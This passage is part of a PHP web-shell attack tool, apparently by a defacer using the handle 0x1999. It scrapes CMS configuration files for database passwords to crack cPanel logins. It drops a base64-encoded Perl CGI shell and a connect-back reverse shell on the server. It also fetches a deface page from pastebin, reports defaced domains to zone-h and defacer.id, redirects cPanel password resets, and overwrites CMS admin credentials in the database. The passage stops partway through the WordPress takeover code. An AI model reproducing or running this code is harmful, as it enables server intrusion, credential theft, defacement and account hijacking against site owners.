  868. $_SESSION[$pcp] = "1";
  869. $i++;
  870. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  871. }
  872. }
  873. }
  874. session_unset();
  875. session_destroy();
  876. }
  877. if ($i == 0) {
  878. } else {
  879. echo "<br>Nemu " . $i . " Cpanel by <font color=lime>0x1999</font>";
  880. }
  881. } elseif ($_POST['scanpass']) {
  882. echo "<center>
  883. <form method='post'>
  884. USER: <br>
  885. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  886. $_usercp = $etcpasswd;
  887. preg_match_all("/(.*?):x:/", $_usercp, $u);
  888. foreach ($u[1] as $user_cp) {
  889. // if (is_dir("/home/$user_cp/public_html")) {
  890. echo "$user_cp\n";
  891.  
  892. // }
  893. }
  894. echo "</textarea><br>
  895. PASS: <br>
  896. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  897. function cp_pass($dir)
  898. {
  899. $pass = "";
  900. $dira = scandir($dir);
  901. foreach ($dira as $dirb) {
  902. if (!is_file("$dir/$dirb")) {
  903. continue;
  904. }
  905.  
  906. $ambil = file_get_contents("$dir/$dirb");
  907. if (preg_match("/WordPress/", $ambil)) {
  908. $pass .= ambilkata($ambil, "DB_PASSWORD', '", "'") . "\n";
  909. } elseif (preg_match("/JConfig|joomla/", $ambil)) {
  910. $pass .= ambilkata($ambil, "password = '", "'") . "\n";
  911. } elseif (preg_match("/konekDB/", $ambil)) {
  912. $pass .= ambilkata($ambil, "$password = '", "'") . "\n";
  913. } elseif (preg_match("/cmsmember/", $ambil)) {
  914. $pass .= ambilkata($ambil, 'dbpasswd = "', '"') . "\n";
  915. } elseif (preg_match("/Magento|Mage_Core/", $ambil)) {
  916. $pass .= ambilkata($ambil, "<password><![CDATA[", "]]></password>") . "\n";
  917. } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  918. $pass .= ambilkata($ambil, 'password = "', '"') . "\n";
  919. } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  920. $pass .= ambilkata($ambil, "'DB_PASSWORD', '", "'") . "\n";
  921. } elseif (preg_match("/client/", $ambil)) {
  922. preg_match("/password=(.*)/", $ambil, $pass1);
  923. if (preg_match('/"/', $pass1[1])) {
  924. $pass1[1] = str_replace('"', "", $pass1[1]);
  925. $pass .= $pass1[1] . "\n";
  926. }
  927. } elseif (preg_match("/cc_encryption_hash/", $ambil)) {
  928. $pass .= ambilkata($ambil, "db_password = '", "'") . "\n";
  929. }
  930. }
  931. echo $pass;
  932. }
  933. $cp_pass = cp_pass($dir);
  934. echo $cp_pass;
  935. echo "</textarea><br>
  936. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  937. </form>
  938. <br></center>";
  939. } else {
  940. echo "<center>
  941. <form method='post'>
  942. USER: <br>
  943. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  944. $_usercp = $etcpasswd;
  945. preg_match_all("/(.*?):x:/", $_usercp, $u);
  946. foreach ($u[1] as $user_cp) {
  947. // if (is_dir("/home/$user_cp/public_html")) {
  948. echo "$user_cp\n";
  949.  
  950. // }
  951. }
  952. echo "</textarea><br>
  953. PASS: <br>
  954. <textarea style='width: 450px; height: 200px;' name='pass_cp'></textarea><br>
  955. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  956. <input type='submit' name='scanpass' style='width: 450px;' value='Scan Password'>
  957. </form>
  958. <br></center>";
  959. }
  960. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cgi')) {
  961. echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1 Bypass Exploit]==--+ </font></b><br><br>";
  962. mkdir('cgitelnet1', 0755);
  963. chdir('cgitelnet1');
  964. $kokdosya = ".htaccess";
  965. $dosya_adi = "$kokdosya";
  966. $dosya = fopen($dosya_adi, 'w') or die("Dosya a&#231;&#305;lamad&#305;!");
  967. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  968.  
  969. AddType application/x-httpd-cgi .cin
  970.  
  971. AddHandler cgi-script .cin
  972. AddHandler cgi-script .cin";
  973. fwrite($dosya, $metin);
  974. fclose($dosya);
  975. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBSZWNvZGVkIEJ5IDB4MTk5OQoKJFdpbk5UID0gMDsKJE5UQ21kU2VwID0gIiYiOwokVW5peENtZFNlcCA9ICI7IjsKJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gPSAxMDsKJFNob3dEeW5hbWljT3V0cHV0ID0gMTsKJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7CiRDbWRQd2QgPSAoJFdpbk5UID8gImNkIiA6ICJwd2QiKTsKJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7CiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7CnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCXByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwoJcHJpbnQgPDxFTkQ7CjxodG1sPgo8aGVhZD4KPHRpdGxlPkNHSS1UZWxuZXQgVmVyc2lvbiAxLjA8L3RpdGxlPgokSHRtbE1ldGFIZWFkZXIKPC9oZWFkPgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBBMEEwQSIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5EaXNjb25uZWN0PC9hPiB8CjxhIGhyZWY9Imh0dHA6Ly93d3cucm9oaXRhYi5jb20vY2dpc2NyaXB0cy9jZ2l0ZWxuZXQuaHRtbCI+SGVscDwvYT48YnI+Cjxmb250IGNvbG9yPSIjQzBDMEMwIiBzaXplPSIzIj4KRU5ECn0Kc3ViIFByaW50UGFnZUZvb3Rlcgp7CglwcmludCAiPC9mb250PjwvYm9keT48L2h0bWw+IjsKfQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CnN1YiBFeGVjdXRlQ29tbWFuZAp7CglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kCgl7CgkJIyB3ZSBjaGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLgoJCQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsKCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7CgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOwoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+IjsKCX0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dAoJewoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsKCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsKCQlwcmludCAiPGNvZGU+JFByb21wdCAkUnVuQ29tbWFuZDwvY29kZT48eG1wPiI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOwoJCWlmKCEkV2luTlQpCgkJewoJCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0OwoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7CgkJfQoJCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQKCQl7CgkJCSR8PTE7CgkJCSRDb21tYW5kIC49ICIgfCI7CgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOwoJCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pCgkJCXsKCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOwoJCQkJcHJpbnQgIiRfXG4iOwoJCQl9CgkJCSR8PTA7CgkJfQoJCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcwoJCXsKCQkJcHJpbnQgYCRDb21tYW5kYDsKCQl9CgkJaWYoISRXaW5OVCkKCQl7CgkJCWFsYXJtKDApOwoJCX0KCQlwcmludCAiPC94bXA+IjsKCX0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJJlByaW50UGFnZUZvb3RlcjsKfQomUmVhZFBhcnNlOwomR2V0Q29va2llczsKJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsKJFNlcnZlck5hbWUgPSAkRU5WeydTRVJWRVJfTkFNRSd9OwoKJFJ1bkNvbW1hbmQgPSAkaW57J2MnfTsKJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9OwokT3B0aW9ucyA9ICRpbnsnbyd9OwokQWN0aW9uID0gJGlueydhJ307CiRBY3Rpb24gPSAiY29tbWFuZCIgaWYoJEFjdGlvbiBlcSAiIik7CiRDdXJyZW50RGlyID0gJGlueydkJ307CmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsKaWYoJEFjdGlvbiBlcSAiY29tbWFuZCIpICMgdXNlciB3YW50cyB0byBydW4gYSBjb21tYW5kCnsKCSZFeGVjdXRlQ29tbWFuZDsKfQo=';
  976.  
  977. $file = fopen("izo.cin", "w+");
  978. $write = fwrite($file, base64_decode($cgishellizocin));
  979. fclose($file);
  980. chmod("izo.cin", 0755);
  981. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  982. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  983. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  984. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  985. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  986. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  987. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  988. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  989. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  990. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  991. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  992. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  993. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  994. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  995. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  996. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  997. YXRhY2hlZFxuXG4iOw==';
  998.  
  999. $file = fopen("dc.pl", "w+");
  1000. $write = fwrite($file, base64_decode($netcatshell));
  1001. fclose($file);
  1002. chmod("dc.pl", 0755);
  1003. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe>
  1004.  
  1005.  
  1006. </div>";
  1007.  
  1008. } elseif (isset($_GET['do']) && ($_GET['do'] == 'deleteme')) {
  1009. function delete_dir($dir)
  1010. {
  1011. if (is_link($dir)) {
  1012. unlink($dir);
  1013. } elseif (!file_exists($dir)) {
  1014. return;
  1015. } elseif (is_dir($dir)) {
  1016. foreach (scandir($dir) as $file) {
  1017. if ($file != '.' && $file != '..') {
  1018. delete_dir("$dir/$file");
  1019. }
  1020. }
  1021. rmdir($dir);
  1022. } elseif (is_file($dir)) {
  1023. unlink($dir);
  1024. } else {
  1025. echo "WARNING: Cannot delete $dir (unknown file type)\n";
  1026. }
  1027. }
  1028. delete_dir(dirname(__FILE__) . "/0xsym/");
  1029. delete_dir(dirname(__FILE__) . "/0xsymlink/");
  1030. delete_dir(dirname(__FILE__) . "/MeLeX/");
  1031. delete_dir(dirname(__FILE__) . "/0xsymv/");
  1032. delete_dir(dirname(__FILE__) . "/0xsym404/");
  1033. delete_dir(dirname(__FILE__) . "/cgitelnet1/");
  1034. delete_dir(dirname(__FILE__) . "/0x1/");
  1035. unlink(__FILE__);
  1036. echo "<script>window.location='./';</script>";
  1037. } elseif (isset($_GET['do']) && ($_GET['do'] == 'mirror')) {
  1038. if ($_POST['arsip'] == '1') {
  1039. $domain = explode("\r\n", $_POST['url']);
  1040. $nick = $_POST['nick'];
  1041. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1042. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1043. function zoneh($url, $nick)
  1044. {
  1045. $ch = curl_init("http://www.zone-h.com/notify/single");
  1046. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1047. curl_setopt($ch, CURLOPT_POST, true);
  1048. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1049. return curl_exec($ch);
  1050. curl_close($ch);
  1051. }
  1052. foreach ($domain as $url) {
  1053. $zoneh = zoneh($url, $nick);
  1054. if (preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1055. echo "$url -> <font color=lime>OK</font><br>";
  1056. } else {
  1057. echo "$url -> <font color=red>ERROR</font><br>";
  1058. }
  1059. }
  1060. }if ($_POST['arsip'] == '2') {
  1061. $site = explode("\r\n", $_POST['sites']);
  1062. $hekel = $_POST['nick'];
  1063. $tim = $_POST['tim'];
  1064. foreach ($site as $sites) {
  1065. $zh = $sites;
  1066. $form_url = "https://www.defacer.id/notify";
  1067. $data_to_post = array();
  1068. $data_to_post['attacker'] = "$hekel";
  1069. $data_to_post['team'] = "$tim";
  1070. $data_to_post['poc'] = 'SQL Injection';
  1071. $data_to_post['url'] = "$zh";
  1072. $curl = curl_init();
  1073. curl_setopt($curl, CURLOPT_URL, $form_url);
  1074. curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post));
  1075. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  1076. curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post);
  1077. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1078. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  1079. $result = curl_exec($curl);
  1080. echo $result;
  1081. curl_close($curl);
  1082. echo "<br>";
  1083. }
  1084.  
  1085. } else {
  1086. echo "
  1087. <script type='text/javascript'>//<![CDATA[
  1088. window.onload=function(){
  1089. document.getElementById('arsip').addEventListener('change', function () {
  1090. var style = this.value == 2 ? 'block' : 'none';
  1091. document.getElementById('defacerid').style.display = style;
  1092. });
  1093. }//]]>
  1094.  
  1095. </script><center>
  1096. <form method='post'>
  1097. <select class='select' id='arsip' name='arsip' style='width: 450px;' height='10'>
  1098. <option value='1'>Zone-h</option>
  1099. <option value='2'>Defacer ID</option></select><br>
  1100. <u>Defacer</u>: <br>
  1101. <input type='text' name='nick' size='50' value='0x1999'><br>
  1102. <div id='defacerid' style='display: none;'><br>
  1103. <u>Team</u>:<br>
  1104. <input type='text' name='tim' size='50' value='Indonesian Code Party'><br><br>
  1105. </div>
  1106. <u>Domains</u>: <br>
  1107. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1108. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1109. </form>";
  1110. }
  1111. echo "</center>";
  1112. } elseif (isset($_GET['do']) && ($_GET['do'] == 'hek')) {
  1113. $url = "http://" . $_SERVER['SERVER_NAME'] . "/0x.htm";
  1114. $hh = $_SERVER['DOCUMENT_ROOT'] . "/0x.htm";
  1115. @file_put_contents($hh, file_get_contents("http://pastebin.com/raw/PDcuwBug"));
  1116. function zoneh($url, $nick)
  1117. {
  1118. $ch = curl_init("http://www.zone-h.com/notify/single");
  1119. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1120. curl_setopt($ch, CURLOPT_POST, true);
  1121. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1122. return curl_exec($ch);
  1123. curl_close($ch);
  1124. }
  1125. $zoneh = zoneh($url, "0x1999");
  1126. if (preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1127. echo "$url -> <font color=lime>OK</font><br>";
  1128. } else {
  1129. echo "$url -> <font color=red>ERROR</font><br>";
  1130. }
  1131. } elseif (isset($_GET['do']) && ($_GET['do'] == 'cpres')) {
  1132. echo "Enter email account : <form method='post'><input type='text' name='email' value='resetpass@hi2.in'> <input type='submit' value='Gas'></form>";
  1133. if ($_POST['email']) {
  1134. $file3 = $_POST['email'];
  1135. $fp3 = fopen("/home/" . $user . "/.contactemail", "w");
  1136. $fw3 = fwrite($fp3, $file3);
  1137. @fclose($fp3);
  1138. $fp4 = fopen("/home/" . $user . "/.cpanel/contactinfo", "w");
  1139. $fw4 = fwrite($fp4, $file3);
  1140. @fclose($fp4);
  1141. $link = $_SERVER['HTTP_HOST'];
  1142. echo "Login here : <a href='https://$link:2083/resetpass?start=1&user=$user' target='_BLANK'>https://$link:2083/resetpass?start=1&user=$user</a> or <a href='http://$link:2082/resetpass?start=1&user=$user' target='_BLANK'>http://$link:2082/resetpass?start=1&user=$user</a>";
  1143. }
  1144. } elseif (isset($_GET['do']) && ($_GET['do'] == 'crp')) {
  1145. if ($_POST['gass']) {
  1146. echo "<center><h1>Config Reset Password</h1>
  1147. <form method='post'>
  1148. Link Config: <br>
  1149. <textarea name='link' style='width: 450px; height:250px;'>";
  1150. UrlLoop($_POST['linkconf'], $_POST['tipe']);
  1151. echo "</textarea><br>
  1152. <input type='submit' style='width: 450px;' name='ngentuconfig' value='Hajar!!'>
  1153. </form></center>";
  1154. } else {
  1155. echo '<center>
  1156. <h1>Config Reset Password</h1>
  1157. <form method="post">
  1158. Select Type :<br><select class="select" name="tipe" style="width: 450px;" height="10">
  1159. <option value="Wordpress">Wordpress</option>
  1160. <option value="Joomla">Joomla</option>
  1161. <option value="Lokomedia">Lokomedia</option>
  1162. <option value="Magento">Magento</option>
  1163. <option value="OpenCart">OpenCart</option>
  1164. <option value="txt">All Config</option>
  1165. </select><br>
  1166. Link Config :<br>
  1167. <input type="text" name="linkconf" height="10" style="width: 450px;" placeholder="http://0xdark.com/cox_symconf/"><br>
  1168. <input type="submit" style="width: 450px;" name="gass" value="Hajar!!">
  1169. </form></center>';
  1170. }
  1171. if ($_POST['ngentuconfig']) {
  1172. echo "<center><table style='width:100%'>
  1173. <tr>
  1174. <th>CMS</th>
  1175. <th>User</th>
  1176. <th>Password</th>
  1177. <th>Login</th>
  1178. <th>Config</th>
  1179. </tr>";
  1180. $user = '0x1999';
  1181. $pass = "0x1999";
  1182. $passx = md5($pass);
  1183. $link = explode("\r\n", $_POST['link']);
  1184.  
  1185. foreach ($link as $file_conf) {
  1186. $config = file_get_contents($file_conf);
  1187. if (preg_match("/JConfig|joomla/", $config)) {
  1188. $dbhost = ambilkata($config, "host = '", "'");
  1189. $dbuser = ambilkata($config, "user = '", "'");
  1190. $dbpass = ambilkata($config, "password = '", "'");
  1191. $dbname = ambilkata($config, "db = '", "'");
  1192. $dbprefix = ambilkata($config, "dbprefix = '", "'");
  1193. $prefix = $dbprefix . "users";
  1194. $conn = mysql_connect($dbhost, $dbuser, $dbpass);
  1195. $db = mysql_select_db($dbname);
  1196. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1197. $result = mysql_fetch_array($q);
  1198. $id = $result['id'];
  1199. $site = ambilkata($config, "sitename = '", "'");
  1200. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1201. echo "<tr><td>Joomla</td>";
  1202. //echo "[ ".$file_conf." ]<br>";
  1203. //echo "CMS => Joomla<br>";
  1204. if ($site == '') {
  1205. $url_target = "<font color=red>ERROR</font><br>";
  1206. } else {
  1207. $url_target = $site;
  1208. }
  1209. if (!$update) {
  1210. echo "<td><font color=red>" . mysql_error() . "</font></td><td>Update Error</td><td>!</td><td>" . $file_conf . "</td>";
  1211. } elseif (!$conn) {
  1212. echo "<td><font color=red>" . mysql_error() . "</font></td><td>Connection Error</td><td>!</td><td>" . $file_conf . "</td>";
  1213. } elseif (!$db) {
  1214. echo "<td><font color=red>" . mysql_error() . "</font></td><td>DB Error</td><td>!</td><td>" . $file_conf . "</td>";
  1215. } else {
  1216. echo "<td><font color=lime>$user</font></td>";
  1217. echo "<td><font color=lime>$pass</font></td>";
  1218. echo "<td><a href=\"https://www.google.com/search?source=hp&q='$url_target'\" target=\"_BLANK\">$url_target</a></td>";
  1219. echo "<td>" . $file_conf . "</td>";
  1220. }
  1221. echo "</tr>";
  1222. mysql_close($conn);
  1223. } elseif (preg_match("/WordPress/", $config)) {
  1224. $dbhost = ambilkata($config, "DB_HOST', '", "'");
  1225. $dbuser = ambilkata($config, "DB_USER', '", "'");
  1226. $dbpass = ambilkata($config, "DB_PASSWORD', '", "'");
  1227. $dbname = ambilkata($config, "DB_NAME', '", "'");
